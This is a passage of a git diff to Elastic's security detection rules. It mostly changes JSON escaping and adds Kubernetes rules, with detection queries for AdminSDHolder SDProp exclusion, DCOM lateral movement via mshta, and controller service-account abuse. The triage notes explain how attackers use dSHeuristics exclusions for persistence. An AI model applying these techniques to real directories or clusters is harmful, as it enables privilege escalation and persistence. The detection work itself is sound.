Exclusion Added", "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json index 061b5bc6285..e5ae52c758a 100644 --- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_108.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "AdminSDHolder SDProp Exclusion Added", "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", - "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json index eb5aa191c48..b7b0ed00e1d 100644 --- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json +++ b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_109.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "AdminSDHolder SDProp Exclusion Added", "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) \u003e 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", + "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", - "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDS Access \u003e\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json index 3571e81f5be..ef54f9a7dbb 100644 --- a/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/621e92b6-7e54-11ee-bdc0-f661ea17fbcd_1.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json index 895387ba984..868c55c6cba 100644 --- a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json +++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_103.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json index 71eccea2969..f9ab0169c77 100644 --- a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json +++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_104.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -117,7 +117,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json index 1149139a72e..773107c0cb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json +++ b/packages/security_detection_engine/kibana/security_rule/622ecb68-fa81-4601-90b5-f8cd661e4520_105.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Incoming DCOM Lateral Movement via MSHTA", - "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e 49151 and destination.port \u003e 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", + "query": "sequence with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"mshta.exe\" and process.args : \"-Embedding\"\n ] by host.id, process.entity_id\n [network where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"mshta.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port > 49151 and destination.port > 49151 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n", "references": [ "https://codewhitesec.blogspot.com/2018/07/lethalhta.html" ], @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -118,7 +118,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json index 01c5ecd0040..c9a082b0d0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_105.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json index 058c410c45f..6c21cd37273 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_106.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json index efb2da7cd11..ae36dffd771 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_107.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json index db78b50641c..339241733ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json +++ b/packages/security_detection_engine/kibana/security_rule/62a70f6f-3c37-43df-a556-f64fa475fba2_108.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json index de263665bf4..b821b7365f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json +++ b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json index ae4a4308f00..f1cb8b24e5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json +++ b/packages/security_detection_engine/kibana/security_rule/62b68eb2-1e47-4da7-85b6-8f478db5b272_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json index 60a3591f8a8..453299f727d 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json +++ b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_4.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json index 7e73fdc4a5c..cd2a1a136da 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json +++ b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_5.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_6.json b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_6.json new file mode 100644 index 00000000000..15b00c9ad13 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63c05204-339a-11ed-a261-0242ac120002_6.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects a request to attach a controller service account to an existing or new pod running in the kube-system namespace. By default, controllers running as part of the API Server utilize admin-equivalent service accounts hosted in the kube-system namespace. Controller service accounts aren't normally assigned to running pods and could indicate adversary behavior within the cluster. An attacker that can create or modify pods or pod controllers in the kube-system namespace, can assign one of these admin-equivalent service accounts to a pod and abuse their powerful token to escalate privileges and gain complete cluster control.", + "false_positives": [ + "Controller service accounts aren't normally assigned to running pods, this is abnormal behavior with very few legitimate use-cases and should result in very few false positives." + ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Suspicious Assignment of Controller Service Account", + "note": "", + "query": "event.dataset : \"kubernetes.audit_logs\"\n and kubernetes.audit.annotations.authorization_k8s_io/decision:\"allow\"\n and kubernetes.audit.verb : \"create\"\n and kubernetes.audit.objectRef.resource : \"pods\"\n and kubernetes.audit.objectRef.namespace : \"kube-system\"\n and kubernetes.audit.requestObject.spec.serviceAccountName:*controller\n", + "references": [ + "https://www.paloaltonetworks.com/apps/pan/public/downloadResource?pagePath=/content/pan/en_US/resources/whitepapers/kubernetes-privilege-escalation-excessive-permissions-in-popular-platforms" + ], + "related_integrations": [ + { + "package": "kubernetes", + "version": "^1.4.1" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.annotations.authorization_k8s_io/decision", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.namespace", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.serviceAccountName", + "type": "keyword" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "63c05204-339a-11ed-a261-0242ac120002", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Data Source: Kubernetes", + "Tactic: Execution", + "Tactic: Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.001", + "name": "Default Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 6 + }, + "id": "63c05204-339a-11ed-a261-0242ac120002_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json index 3dbcbba478d..82dc892b8db 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json +++ b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_3.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json index 55add01b48c..5e7f69f5a89 100644 --- a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json +++ b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_4.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_5.json b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_5.json new file mode 100644 index 00000000000..c1a34c95448 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/63c056a0-339a-11ed-a261-0242ac120002_5.json @@ -0,0 +1,76 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects when a service account makes an unauthorized request for resources from the API server. Service accounts follow a very predictable pattern of behavior. A 